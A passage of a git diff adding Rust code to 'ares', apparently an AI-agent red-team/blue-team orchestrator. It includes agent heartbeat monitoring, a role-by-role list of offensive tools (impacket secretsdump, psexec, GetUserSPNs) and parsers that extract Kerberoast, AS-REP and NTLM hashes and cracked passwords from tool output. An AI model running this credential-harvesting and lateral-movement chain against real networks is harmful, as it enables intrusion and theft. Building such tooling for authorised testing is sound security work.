+async fn run_blue_only() -> Result<()> {
+    info!("Running in BLUE-ONLY mode (no red team orchestrator)");
+
+    let redis_url =
+        std::env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string());
+
+    // Load YAML config for observability URLs
+    if let Ok(cfg) = ares_core::config::AresConfig::from_env() {
+        if let Some(ref obs) = cfg.observability {
+            if !obs.loki_url.is_empty() && std::env::var("LOKI_URL").is_err() {
+                std::env::set_var("LOKI_URL", &obs.loki_url);
+            }
+            if !obs.loki_auth_token.is_empty() && std::env::var("LOKI_AUTH_TOKEN").is_err() {
+                std::env::set_var("LOKI_AUTH_TOKEN", &obs.loki_auth_token);
+            }
+            if !obs.prometheus_url.is_empty() && std::env::var("PROMETHEUS_URL").is_err() {
+                std::env::set_var("PROMETHEUS_URL", &obs.prometheus_url);
+            }
+        }
+    }
+
+    let model_spec = std::env::var("ARES_LLM_MODEL")
+        .or_else(|_| std::env::var("ARES_BLUE_LLM_MODEL"))
+        .context("Set ARES_LLM_MODEL or ARES_BLUE_LLM_MODEL for blue-only mode")?;
+
+    let (provider, model_name) =
+        ares_llm::create_provider(&model_spec).context("Failed to create LLM provider")?;
+
+    // Blue uses a simple Redis-based tool dispatcher (no operation-scoped auth throttle)
+    let queue = self::task_queue::TaskQueue::connect(&redis_url)
+        .await
+        .context("Failed to connect to Redis")?;
+    let auth_throttle = tool_dispatcher::AuthThrottle::new(3, std::time::Duration::from_secs(30));
+    let blue_disp: Arc<dyn tool_dispatcher::ToolDispatcher> =
+        Arc::new(tool_dispatcher::RedisToolDispatcher::new(
+            queue,
+            "blue-orchestrator".to_string(),
+            auth_throttle,
+        ));
+
+    info!(model = %model_name, redis = %redis_url, "Blue-only orchestrator ready");
+
+    let (shutdown_tx, shutdown_rx) = watch::channel(false);
+
+    let blue_handle =
+        blue::spawn_blue_orchestrator(provider, model_name, blue_disp, redis_url, shutdown_rx);
+
+    // Wait for shutdown signal
+    signal::ctrl_c().await?;
+    info!("Shutdown signal received");
+    let _ = shutdown_tx.send(true);
+
+    let shutdown_timeout = std::time::Duration::from_secs(120);
+    tokio::select! {
+        _ = blue_handle => {
+            info!("Blue orchestrator stopped");
+        }
+        _ = tokio::time::sleep(shutdown_timeout) => {
+            warn!("Blue orchestrator shutdown timed out");
+        }
+    }
+
+    info!("ares-orchestrator (blue-only) stopped");
+    Ok(())
+}
diff --git a/ares-cli/src/orchestrator/monitoring.rs b/ares-cli/src/orchestrator/monitoring.rs
new file mode 100644
index 00000000..bfad6e18
--- /dev/null
+++ b/ares-cli/src/orchestrator/monitoring.rs
@@ -0,0 +1,471 @@
+//! Heartbeat monitoring and stale-task cleanup.
+//!
+//! Mirrors the Python `ares.core.dispatcher.monitoring.MonitoringMixin`:
+//! - Periodic heartbeat sweep to detect dead agents
+//! - Stale task cleanup to prevent throttle deadlock
+//! - Operation lock TTL refresh
+
+use anyhow::Result;
+use chrono::{DateTime, Utc};
+use std::collections::HashMap;
+use std::sync::Arc;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::config::OrchestratorConfig;
+use crate::orchestrator::routing::ActiveTaskTracker;
+use crate::orchestrator::task_queue::TaskQueue;
+
+// ---------------------------------------------------------------------------
+// Agent registry
+// ---------------------------------------------------------------------------
+
+/// Live state for a registered agent.
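+///
+/// Mirrors the worker heartbeat payload read back from Redis in
+/// `run_heartbeat_sweep` (illustrative values taken from the tests below):
+///
+/// ```ignore
+/// AgentState {
+///     name: "ares-recon-0".to_string(),
+///     role: "recon".to_string(),
+///     status: "busy".to_string(),
+///     last_heartbeat: Utc::now(),
+///     current_task: Some("task-42".to_string()),
+/// };
+/// ```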
+#[derive(Debug, Clone)]
+#[allow(dead_code)]
+pub struct AgentState {
+    pub name: String,
+    pub role: String,
+    pub status: String,
+    pub last_heartbeat: DateTime<Utc>,
+    pub current_task: Option<String>,
+}
+
+/// Registry of known agents with their health state.
+#[derive(Debug, Clone)]
+pub struct AgentRegistry {
+    agents: Arc<tokio::sync::Mutex<HashMap<String, AgentState>>>,
+}
+
+impl AgentRegistry {
+    pub fn new() -> Self {
+        Self {
+            agents: Arc::new(tokio::sync::Mutex::new(HashMap::new())),
+        }
+    }
+
+    /// Register an agent (or update it if already known).
+    #[allow(dead_code)]
+    pub async fn register(&self, name: &str, role: &str) {
+        let mut agents = self.agents.lock().await;
+        agents
+            .entry(name.to_string())
+            .and_modify(|a| {
+                a.role = role.to_string();
+            })
+            .or_insert_with(|| AgentState {
+                name: name.to_string(),
+                role: role.to_string(),
+                status: "idle".to_string(),
+                last_heartbeat: Utc::now(),
+                current_task: None,
+            });
+    }
+
+    /// Update heartbeat data from Redis.
+    pub async fn update_heartbeat(
+        &self,
+        name: &str,
+        status: &str,
+        current_task: Option<&str>,
+        timestamp: DateTime<Utc>,
+    ) {
+        let mut agents = self.agents.lock().await;
+        if let Some(agent) = agents.get_mut(name) {
+            agent.status = status.to_string();
+            agent.current_task = current_task.map(|s| s.to_string());
+            agent.last_heartbeat = timestamp;
+        }
+    }
+
+    /// Return agents whose heartbeat is older than `timeout`.
+    pub async fn stale_agents(&self, timeout: std::time::Duration) -> Vec<AgentState> {
+        let agents = self.agents.lock().await;
+        let cutoff = Utc::now() - chrono::Duration::from_std(timeout).unwrap_or_default();
+        agents
+            .values()
+            .filter(|a| a.last_heartbeat < cutoff && a.status != "offline")
+            .cloned()
+            .collect()
+    }
+
+    /// Mark an agent offline.
+    pub async fn mark_offline(&self, name: &str) {
+        let mut agents = self.agents.lock().await;
+        if let Some(agent) = agents.get_mut(name) {
+            agent.status = "offline".to_string();
+        }
+    }
+
+    /// List all registered agent names (for heartbeat sweep).
+    pub async fn agent_names(&self) -> Vec<String> {
+        let agents = self.agents.lock().await;
+        agents.keys().cloned().collect()
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Lock keeper — independent task that only refreshes the operation lock
+// ---------------------------------------------------------------------------
+
+/// Spawn a dedicated task that extends the operation lock TTL every
+/// `heartbeat_interval`. This is intentionally decoupled from the heartbeat
+/// sweep so that a slow/hanging Redis call in the sweep cannot block lock
+/// refresh and cause the lock to expire.
+///
+/// Creates its own Redis connection to avoid contention with the main
+/// connection pool used for tool dispatch and result polling.
+pub fn spawn_lock_keeper(
+    queue: TaskQueue,
+    config: Arc<OrchestratorConfig>,
+    mut shutdown: watch::Receiver<bool>,
+) -> tokio::task::JoinHandle<()> {
+    tokio::spawn(async move {
+        // Create a dedicated Redis connection for the lock keeper so that
+        // EXPIRE commands are not queued behind heavy BRPOP/LPUSH traffic
+        // on the shared connection manager.
+        let dedicated_queue = match TaskQueue::connect(&config.redis_url).await {
+            Ok(q) => {
+                info!("Lock keeper using dedicated Redis connection");
+                q
+            }
+            Err(e) => {
+                warn!(err = %e, "Lock keeper failed to create dedicated connection, falling back to shared");
+                queue.clone()
+            }
+        };
+
+        let mut interval = tokio::time::interval(config.heartbeat_interval);
+
+        loop {
+            tokio::select! {
+                _ = interval.tick() => {},
+                _ = shutdown.changed() => {
+                    debug!("Lock keeper shutting down");
+                    break;
+                }
+            }
+
+            // Wrap in a timeout so a hung Redis connection can't block us
+            // for longer than the lock TTL.
+            let extend_timeout = std::time::Duration::from_secs(10);
+            let result = tokio::time::timeout(
+                extend_timeout,
+                dedicated_queue.extend_lock(&config.operation_id, config.lock_ttl),
+            )
+            .await;
+
+            match result {
+                Ok(Ok(true)) => {} // Lock TTL refreshed
+                Ok(Ok(false)) => {
+                    // Lock key disappeared — re-acquire it
+                    warn!(
+                        operation_id = %config.operation_id,
+                        "Lock key missing, attempting re-acquisition"
+                    );
+                    match dedicated_queue
+                        .try_acquire_lock(&config.operation_id, config.lock_ttl)
+                        .await
+                    {
+                        Ok(true) => info!(
+                            operation_id = %config.operation_id,
+                            "Operation lock re-acquired"
+                        ),
+                        Ok(false) => warn!(
+                            operation_id = %config.operation_id,
+                            "Lock re-acquisition failed — another holder exists"
+                        ),
+                        Err(e) => warn!(err = %e, "Lock re-acquisition error"),
+                    }
+                }
+                Ok(Err(e)) => {
+                    warn!(err = %e, "Failed to extend operation lock");
+                }
+                Err(_) => {
+                    warn!("Lock extend timed out (Redis unresponsive?)");
+                }
+            }
+        }
+    })
+}
+
+// ---------------------------------------------------------------------------
+// Heartbeat monitor task
+// ---------------------------------------------------------------------------
+
+/// Spawn a background task that periodically:
+/// 1. Reads heartbeat keys from Redis for all known agents
+/// 2. Marks stale agents as offline
+/// 3. Cleans up stale tasks
+///
+/// Lock refresh is handled by the separate `spawn_lock_keeper` task.
+///
+/// Runs until `shutdown` is signalled.
+pub fn spawn_heartbeat_monitor(
+    queue: TaskQueue,
+    registry: AgentRegistry,
+    tracker: ActiveTaskTracker,
+    config: Arc<OrchestratorConfig>,
+    mut shutdown: watch::Receiver<bool>,
+) -> tokio::task::JoinHandle<()> {
+    tokio::spawn(async move {
+        let mut interval = tokio::time::interval(config.heartbeat_interval);
+        let mut consecutive_failures: u32 = 0;
+
+        loop {
+            tokio::select! {
+                _ = interval.tick() => {},
+                _ = shutdown.changed() => {
+                    info!("Heartbeat monitor shutting down");
+                    break;
+                }
+            }
+
+            if let Err(e) = run_heartbeat_sweep(&queue, &registry, &config).await {
+                consecutive_failures += 1;
+                warn!(
+                    attempt = consecutive_failures,
+                    err = %e,
+                    "Heartbeat sweep failed"
+                );
+                // Back off on repeated failures (5s per consecutive failure, capped at 15s)
+                let delay = std::time::Duration::from_secs(std::cmp::min(
+                    15,
+                    (consecutive_failures as u64) * 5,
+                ));
+                tokio::time::sleep(delay).await;
+                continue;
+            }
+            consecutive_failures = 0;
+
+            // Clean up stale tasks (salvage any pending results first)
+            if let Err(e) = cleanup_stale_tasks(&tracker, &queue, &config).await {
+                warn!(err = %e, "Stale task cleanup failed");
+            }
+        }
+    })
+}
+
+/// Read heartbeats from Redis and update the registry.
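+///
+/// Sketch of the resulting transition (hypothetical timings, mirroring the
+/// `stale_agent_detected` test below):
+///
+/// ```ignore
+/// // A heartbeat older than `config.heartbeat_timeout` (e.g. 60s)...
+/// registry.update_heartbeat("old", "idle", None, Utc::now() - chrono::Duration::seconds(120)).await;
+/// // ...shows up in stale_agents() and is then marked offline by the sweep.
+/// assert_eq!(registry.stale_agents(std::time::Duration::from_secs(60)).await.len(), 1);
+/// ```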
+async fn run_heartbeat_sweep(
+    queue: &TaskQueue,
+    registry: &AgentRegistry,
+    config: &OrchestratorConfig,
+) -> Result<()> {
+    let names = registry.agent_names().await;
+    for name in &names {
+        match queue.get_heartbeat(name).await {
+            Ok(Some(hb)) => {
+                let ts = DateTime::parse_from_rfc3339(&hb.timestamp)
+                    .map(|dt| dt.with_timezone(&Utc))
+                    .unwrap_or_else(|_| Utc::now());
+                registry
+                    .update_heartbeat(name, &hb.status, hb.current_task.as_deref(), ts)
+                    .await;
+            }
+            Ok(None) => {
+                debug!(agent = %name, "No heartbeat key in Redis");
+            }
+            Err(e) => {
+                warn!(agent = %name, err = %e, "Failed to read heartbeat");
+            }
+        }
+    }
+
+    // Mark stale agents offline
+    let stale = registry.stale_agents(config.heartbeat_timeout).await;
+    for agent in &stale {
+        warn!(
+            agent = %agent.name,
+            last_hb = %agent.last_heartbeat,
+            "Agent heartbeat stale — marking offline"
+        );
+        registry.mark_offline(&agent.name).await;
+    }
+
+    Ok(())
+}
+
+/// Remove tasks that have been active longer than the configured stale timeout.
+///
+/// Before removing, checks Redis for unclaimed results and logs a warning so
+/// we know the result consumer missed them. (The real-time discovery push in
+/// `RedisToolDispatcher` ensures discoveries still reach state.)
+async fn cleanup_stale_tasks(
+    tracker: &ActiveTaskTracker,
+    queue: &TaskQueue,
+    config: &OrchestratorConfig,
+) -> Result<()> {
+    let llm_count = tracker.llm_task_count().await;
+    let hard_cap = config.hard_cap();
+
+    // Use shorter timeout when at hard cap to break deadlock faster
+    let effective_timeout = if llm_count >= hard_cap {
+        config.stale_task_timeout / 2
+    } else {
+        config.stale_task_timeout
+    };
+
+    let stale = tracker.stale_tasks(effective_timeout).await;
+    for task in &stale {
+        // Check if there's an unclaimed result sitting in Redis
+        let has_unclaimed = queue
+            .has_pending_result(&task.task_id)
+            .await
+            .unwrap_or(false);
+
+        if has_unclaimed {
+            warn!(
+                task_id = %task.task_id,
+                role = %task.role,
+                age_secs = task.submitted_at.elapsed().as_secs(),
+                "Removing stale task with UNCLAIMED result in Redis (result consumer missed it)"
+            );
+        } else {
+            warn!(
+                task_id = %task.task_id,
+                role = %task.role,
+                age_secs = task.submitted_at.elapsed().as_secs(),
+                "Removing stale task"
+            );
+        }
+        tracker.remove(&task.task_id).await;
+    }
+
+    if !stale.is_empty() {
+        info!(
+            removed = stale.len(),
+            llm_count, hard_cap, "Stale task cleanup complete"
+        );
+    }
+
+    Ok(())
+}
+
+// ---------------------------------------------------------------------------
+// Pre-flight tool check
+// ---------------------------------------------------------------------------
+
+/// Critical tools per worker role. If any of these are missing, operations
+/// will be severely degraded.
+pub(crate) const CRITICAL_TOOLS: &[(&str, &[&str])] = &[
+    ("recon", &["nmap", "netexec"]),
+    (
+        "credential_access",
+        &[
+            "impacket-GetUserSPNs",
+            "impacket-GetNPUsers",
+            "impacket-secretsdump",
+        ],
+    ),
+    ("privesc", &["impacket-findDelegation", "impacket-getST"]),
+    (
+        "lateral",
+        &[
+            "impacket-psexec",
+            "impacket-smbexec",
+            "impacket-secretsdump",
+        ],
+    ),
+];
+
+/// Query Redis for each worker's tool inventory and report any missing
+/// critical tools. Returns a list of (role, missing_tools) pairs.
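+///
+/// Each worker publishes its inventory as a JSON array of tool names under
+/// `ares:tools:ares-{role}-agent`. A hypothetical worker-side sketch (the
+/// publishing code lives in the worker, not in this module):
+///
+/// ```ignore
+/// let inventory = serde_json::to_string(&["nmap", "netexec"])?;
+/// redis::AsyncCommands::set(&mut conn, "ares:tools:ares-recon-agent", inventory).await?;
+/// ```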
+pub(crate) async fn preflight_tool_check(
+    conn: &mut redis::aio::ConnectionManager,
+) -> Vec<(String, Vec<String>)> {
+    use redis::AsyncCommands;
+
+    let mut problems = Vec::new();
+
+    for &(role, critical) in CRITICAL_TOOLS {
+        let agent_key = format!("ares:tools:ares-{role}-agent");
+        let available: Vec<String> = match conn.get::<_, Option<String>>(&agent_key).await {
+            Ok(Some(json)) => serde_json::from_str(&json).unwrap_or_default(),
+            _ => {
+                // No inventory published yet — worker may not have started
+                warn!(
+                    role = role,
+                    "No tool inventory found — worker may not be running"
+                );
+                problems.push((
+                    role.to_string(),
+                    critical.iter().map(|s| s.to_string()).collect(),
+                ));
+                continue;
+            }
+        };
+
+        let missing: Vec<String> = critical
+            .iter()
+            .filter(|&&tool| !available.iter().any(|a| a == tool))
+            .map(|s| s.to_string())
+            .collect();
+
+        if !missing.is_empty() {
+            problems.push((role.to_string(), missing));
+        }
+    }
+
+    problems
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[tokio::test]
+    async fn register_and_list() {
+        let r = AgentRegistry::new();
+        r.register("ares-recon-0", "recon").await;
+        r.register("ares-lateral-0", "lateral").await;
+        let mut names = r.agent_names().await;
+        names.sort();
+        assert_eq!(names, vec!["ares-lateral-0", "ares-recon-0"]);
+    }
+
+    #[tokio::test]
+    async fn heartbeat_update_prevents_staleness() {
+        let r = AgentRegistry::new();
+        r.register("a1", "recon").await;
+        r.update_heartbeat("a1", "busy", Some("task-42"), Utc::now())
+            .await;
+        assert!(r
+            .stale_agents(std::time::Duration::from_secs(60))
+            .await
+            .is_empty());
+    }
+
+    #[tokio::test]
+    async fn stale_agent_detected() {
+        let r = AgentRegistry::new();
+        r.register("old", "recon").await;
+        let old_ts = Utc::now() - chrono::Duration::seconds(120);
+        r.update_heartbeat("old", "idle", None, old_ts).await;
+        let stale = r.stale_agents(std::time::Duration::from_secs(60)).await;
+        assert_eq!(stale.len(), 1);
+        assert_eq!(stale[0].name, "old");
+    }
+
+    #[tokio::test]
+    async fn mark_offline_excludes_from_stale() {
+        let r = AgentRegistry::new();
+        r.register("dead", "recon").await;
+        let old_ts = Utc::now() - chrono::Duration::seconds(300);
+        r.update_heartbeat("dead", "idle", None, old_ts).await;
+        r.mark_offline("dead").await;
+        assert!(r
+            .stale_agents(std::time::Duration::from_secs(60))
+            .await
+            .is_empty());
+    }
+
+    #[tokio::test]
+    async fn re_register_updates_role() {
+        let r = AgentRegistry::new();
+        r.register("a1", "recon").await;
+        r.register("a1", "lateral").await;
+        let agents = r.agents.lock().await;
+        assert_eq!(agents.get("a1").unwrap().role, "lateral");
+    }
+}
diff --git a/ares-cli/src/orchestrator/output_extraction/hashes.rs b/ares-cli/src/orchestrator/output_extraction/hashes.rs
new file mode 100644
index 00000000..11ac84ea
--- /dev/null
+++ b/ares-cli/src/orchestrator/output_extraction/hashes.rs
@@ -0,0 +1,308 @@
+use regex::Regex;
+use std::sync::LazyLock;
+
+use ares_core::models::{Credential, Hash};
+
+use super::{is_valid_credential, make_credential};
+
+static RE_TGS_HASH: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"(\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)\$[^$]+\$[a-fA-F0-9$]+)").unwrap()
+});
+
+static RE_ASREP_HASH: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(\$krb5asrep\$\d+\$([^@:]+)@([^:]+):[a-fA-F0-9$]+)").unwrap());
+
+// domain\user:rid:lmhash:nthash:::
+static RE_NTLM_DOMAIN: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"([^\\:\s]+)\\([^:\\]+):\d+:([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::").unwrap()
+});
+
+// user:rid:lmhash:nthash:::
+static RE_NTLM_PLAIN: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"^([^:\\$\s]+):(\d+):([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::").unwrap()
+});
+
+// Partial NTLM line (line-wrapped secretsdump)
+static RE_NTLM_PARTIAL: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"^[^:\s]+:\d+:[a-fA-F0-9]{32}:[a-fA-F0-9]+$").unwrap());
+
+static RE_NTLM_CONTINUATION: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"^[a-fA-F0-9]+:::$").unwrap());
+
+pub fn extract_hashes(output: &str, default_domain: &str) -> Vec<Hash> {
+    let mut hashes = Vec::new();
+    let mut seen = std::collections::HashSet::new();
+
+    // First pass: unwrap line-wrapped NTLM hashes
+    let lines: Vec<&str> = output.lines().collect();
+    let mut unwrapped: Vec<String> = Vec::new();
+    let mut i = 0;
+    while i < lines.len() {
+        let line = lines[i].trim();
+        if RE_NTLM_PARTIAL.is_match(line) && i + 1 < lines.len() {
+            let next = lines[i + 1].trim();
+            if RE_NTLM_CONTINUATION.is_match(next) {
+                unwrapped.push(format!("{}{}", line, next));
+                i += 2;
+                continue;
+            }
+        }
+        unwrapped.push(line.to_string());
+        i += 1;
+    }
+
+    for line in &unwrapped {
+        // Priority: TGS → AS-REP → NTLM (first match wins)
+
+        // TGS (Kerberoast)
+        if let Some(caps) = RE_TGS_HASH.captures(line) {
+            let hash_value = caps.get(1).unwrap().as_str();
+            let username = caps.get(2).unwrap().as_str();
+            let domain = caps.get(3).unwrap().as_str();
+            let key = format!("tgs:{}@{}", username.to_lowercase(), domain.to_lowercase());
+            if seen.insert(key) {
+                hashes.push(Hash {
+                    id: uuid::Uuid::new_v4().to_string(),
+                    username: username.to_string(),
+                    hash_value: hash_value.to_string(),
+                    hash_type: "kerberoast".to_string(),
+                    domain: domain.to_string(),
+                    cracked_password: None,
+                    source: "output_extraction".to_string(),
+                    discovered_at: Some(chrono::Utc::now()),
+                    parent_id: None,
+                    attack_step: 0,
+                    aes_key: None,
+                });
+            }
+            continue;
+        }
+
+        // AS-REP
+        if let Some(caps) = RE_ASREP_HASH.captures(line) {
+            let hash_value = caps.get(1).unwrap().as_str();
+            let username = caps.get(2).unwrap().as_str();
+            let domain = caps.get(3).unwrap().as_str();
+            let key = format!(
+                "asrep:{}@{}",
+                username.to_lowercase(),
+                domain.to_lowercase()
+            );
+            if seen.insert(key) {
+                hashes.push(Hash {
+                    id: uuid::Uuid::new_v4().to_string(),
+                    username: username.to_string(),
+                    hash_value: hash_value.to_string(),
+                    hash_type: "asrep".to_string(),
+                    domain: domain.to_string(),
+                    cracked_password: None,
+                    source: "output_extraction".to_string(),
+                    discovered_at: Some(chrono::Utc::now()),
+                    parent_id: None,
+                    attack_step: 0,
+                    aes_key: None,
+                });
+            }
+            continue;
+        }
+
+        // NTLM with domain prefix
+        if let Some(caps) = RE_NTLM_DOMAIN.captures(line) {
+            let domain = caps.get(1).unwrap().as_str();
+            let username = caps.get(2).unwrap().as_str();
+            let lm = caps.get(3).unwrap().as_str();
+            let nt = caps.get(4).unwrap().as_str();
+            let hash_value = format!("{lm}:{nt}");
+            let key = format!("ntlm:{}@{}", username.to_lowercase(), domain.to_lowercase());
+            if seen.insert(key) {
+                hashes.push(Hash {
+                    id: uuid::Uuid::new_v4().to_string(),
+                    username: username.to_string(),
+                    hash_value,
+                    hash_type: "ntlm".to_string(),
+                    domain: domain.to_string(),
+                    cracked_password: None,
+                    source: "output_extraction".to_string(),
+                    discovered_at: Some(chrono::Utc::now()),
+                    parent_id: None,
+                    attack_step: 0,
+                    aes_key: None,
+                });
+            }
+            continue;
+        }
+
+        // NTLM without domain prefix
+        if let Some(caps) = RE_NTLM_PLAIN.captures(line) {
+            let username = caps.get(1).unwrap().as_str();
+            let lm = caps.get(3).unwrap().as_str();
+            let nt = caps.get(4).unwrap().as_str();
+            let hash_value = format!("{lm}:{nt}");
+            let key = format!(
+                "ntlm:{}@{}",
+                username.to_lowercase(),
+                default_domain.to_lowercase()
+            );
+            if seen.insert(key) {
+                hashes.push(Hash {
+                    id: uuid::Uuid::new_v4().to_string(),
+                    username: username.to_string(),
+                    hash_value,
+                    hash_type: "ntlm".to_string(),
+                    domain: default_domain.to_string(),
+                    cracked_password: None,
+                    source: "output_extraction".to_string(),
+                    discovered_at: Some(chrono::Utc::now()),
+                    parent_id: None,
+                    attack_step: 0,
+                    aes_key: None,
+                });
+            }
+        }
+    }
+
+    hashes
+}
+
+/// Hashcat cracked TGS: $krb5tgs$23$*user$DOMAIN$spn*$hash:plaintext
+static RE_CRACKED_TGS: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)\$[^*]+\*\$[a-fA-F0-9$]+:(.+)$").unwrap()
+});
+
+/// Cracked AS-REP: $krb5asrep$23$user@DOMAIN:hash:plaintext (hashcat)
+/// or $krb5asrep$23$user@DOMAIN:plaintext (john --show, no hex section)
+static RE_CRACKED_ASREP: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"\$krb5asrep\$\d+\$([^@:]+)@([^:]+):(?:[a-fA-F0-9$]+:)?(.+)$").unwrap()
+});
+
+/// John --show output: user:plaintext (with optional trailing :::... fields)
+/// Only matches lines that look like john --show format — username followed by
+/// password, then optional RID and empty LM/NT fields.
+static RE_JOHN_SHOW: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"^([^:\s$][^:]*):([^:]+):\d*:(?:[a-fA-F0-9]*:){0,3}:*\s*$").unwrap()
+});
+
+/// John --show unknown user: ?:plaintext (john can't determine username from TGS hashes)
+static RE_JOHN_UNKNOWN_USER: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^\?:(.+)$").unwrap());
+
+/// Extract username/domain from a TGS hash in the output text.
+static RE_TGS_HASH_USER: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)").unwrap());
+
+pub fn extract_cracked_passwords(output: &str, default_domain: &str) -> Vec<Credential> {
+    let mut credentials = Vec::new();
+    let mut seen = std::collections::HashSet::new();
+
+    // Detect john --show context (john outputs "N password hash cracked")
+    let is_john_output =
+        output.contains("password hash cracked") || output.contains("password hashes cracked");
+
+    for line in output.lines() {
+        let stripped = line.trim();
+        if stripped.is_empty() {
+            continue;
+        }
+
+        // Hashcat cracked TGS (Kerberoast)
+        if let Some(caps) = RE_CRACKED_TGS.captures(stripped) {
+            let username = caps.get(1).unwrap().as_str();
+            let domain = caps.get(2).unwrap().as_str();
+            let password = caps.get(3).unwrap().as_str();
+            if is_valid_credential(username, password) {
+                let key = format!(
+                    "cracked:{}@{}",
+                    username.to_lowercase(),
+                    domain.to_lowercase()
+                );
+                if seen.insert(key) {
+                    credentials.push(make_credential(
+                        username,
+                        password,
+                        domain,
+                        "cracked:hashcat",
+                    ));
+                }
+            }
+            continue;
+        }
+
+        // Hashcat cracked AS-REP
+        if let Some(caps) = RE_CRACKED_ASREP.captures(stripped) {
+            let username = caps.get(1).unwrap().as_str();
+            let domain = caps.get(2).unwrap().as_str();
+            let password = caps.get(3).unwrap().as_str();
+            if is_valid_credential(username, password) {
+                let key = format!(
+                    "cracked:{}@{}",
+                    username.to_lowercase(),
+                    domain.to_lowercase()
+                );
+                if seen.insert(key) {
+                    credentials.push(make_credential(
+                        username,
+                        password,
+                        domain,
+                        "cracked:hashcat",
+                    ));
+                }
+            }
+            continue;
+        }
+
+        // John --show output (only if we detected john context)
+        if is_john_output {
+            // John --show unknown user: ?:password (TGS hashes)
+            // Try to extract username from a $krb5tgs$ line in the same output.
+            if let Some(caps) = RE_JOHN_UNKNOWN_USER.captures(stripped) {
+                let password = caps.get(1).unwrap().as_str().trim();
+                if is_valid_credential("?", password) {
+                    // Scan output for a TGS hash line to get username/domain
+                    if let Some(tgs_caps) = RE_TGS_HASH_USER.captures(output) {
+                        let username = tgs_caps.get(1).unwrap().as_str();
+                        let domain = tgs_caps.get(2).unwrap().as_str();
+                        let key = format!(
+                            "cracked:{}@{}",
+                            username.to_lowercase(),
+                            domain.to_lowercase()
+                        );
+                        if seen.insert(key) {
+                            credentials.push(make_credential(
+                                username,
+                                password,
+                                domain,
+                                "cracked:john",
+                            ));
+                        }
+                    }
+                }
+                continue;
+            }
+
+            if let Some(caps) = RE_JOHN_SHOW.captures(stripped) {
+                let username = caps.get(1).unwrap().as_str();
+                let password = caps.get(2).unwrap().as_str();
+                // Skip john summary lines
+                if username.chars().all(|c| c.is_ascii_digit()) {
+                    continue;
+                }
+                if is_valid_credential(username, password) {
+                    let key = format!(
+                        "cracked:{}@{}",
+                        username.to_lowercase(),
+                        default_domain.to_lowercase()
+                    );
+                    if seen.insert(key) {
+                        credentials.push(make_credential(
+                            username,
+                            password,
+                            default_domain,
+                            "cracked:john",
+                        ));
+                    }
+                }
+            }
+        }
+    }
+
+    credentials
+}
diff --git a/ares-cli/src/orchestrator/output_extraction/hosts.rs b/ares-cli/src/orchestrator/output_extraction/hosts.rs
new file mode 100644
index 00000000..b8cb463d
--- /dev/null
+++ b/ares-cli/src/orchestrator/output_extraction/hosts.rs
@@ -0,0 +1,108 @@
+use regex::Regex;
+use std::sync::LazyLock;
+
+use ares_core::models::Host;
+
+static RE_SMB_BANNER: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"SMB\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+([A-Za-z0-9_.\-]+)\s+\[\*\]\s+(.+)")
+        .unwrap()
+});
+
+static RE_SMB_BANNER_NAME: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"\(name:([^)]+)\)").unwrap());
+
+static RE_SMB_BANNER_DOMAIN: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"\(domain:([^)]+)\)").unwrap());
+
+static RE_SMB_BANNER_OS: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"^\s*([^(]+?)\s+\(name:").unwrap());
+
+static RE_SMB_SIMPLE: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"^SMB\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+([A-Za-z0-9_\-]+)\s+").unwrap()
+});
+
+pub fn extract_hosts(output: &str) -> Vec<Host> {
+    let mut hosts = Vec::new();
+    let mut seen = std::collections::HashSet::new();
+
+    for line in output.lines() {
+        let stripped = line.trim();
+
+        // Banner line with OS info: SMB IP PORT HOST [*] details
+        if let Some(caps) = RE_SMB_BANNER.captures(stripped) {
+            let ip = caps.get(1).unwrap().as_str().to_string();
+            if !seen.insert(ip.clone()) {
+                continue;
+            }
+            let details = caps.get(3).unwrap().as_str();
+            let netbios_name = RE_SMB_BANNER_NAME
+                .captures(details)
+                .map(|c| c.get(1).unwrap().as_str().to_string())
+                .unwrap_or_default();
+            let domain = RE_SMB_BANNER_DOMAIN
+                .captures(details)
+                .map(|c| {
+                    // netexec appends trailing artifacts like "0." — strip them
+                    c.get(1)
+                        .unwrap()
+                        .as_str()
+                        .trim_end_matches("0.")
+                        .trim_end_matches('.')
+                        .to_string()
+                })
+                .unwrap_or_default();
+            let os = RE_SMB_BANNER_OS
+                .captures(details)
+                .map(|c| c.get(1).unwrap().as_str().trim().to_string())
+                .unwrap_or_default();
+
+            let hostname =
+                if !netbios_name.is_empty() && !domain.is_empty() && !netbios_name.contains('.') {
+                    format!("{}.{}", netbios_name.to_lowercase(), domain.to_lowercase())
+                } else {
+                    netbios_name
+                };
+
+            let is_dc = details.contains("(signing:True)");
+            let mut roles = Vec::new();
+            if is_dc {
+                roles.push("AD DC".to_string());
+            }
+
+            hosts.push(Host {
+                ip,
+                hostname,
+                os,
+                roles,
+                services: vec![],
+                is_dc,
+                owned: false,
+            });
+            continue;
+        }
+
+        // Fallback simple line
+        if let Some(caps) = RE_SMB_SIMPLE.captures(stripped) {
+            let ip = caps.get(1).unwrap().as_str().to_string();
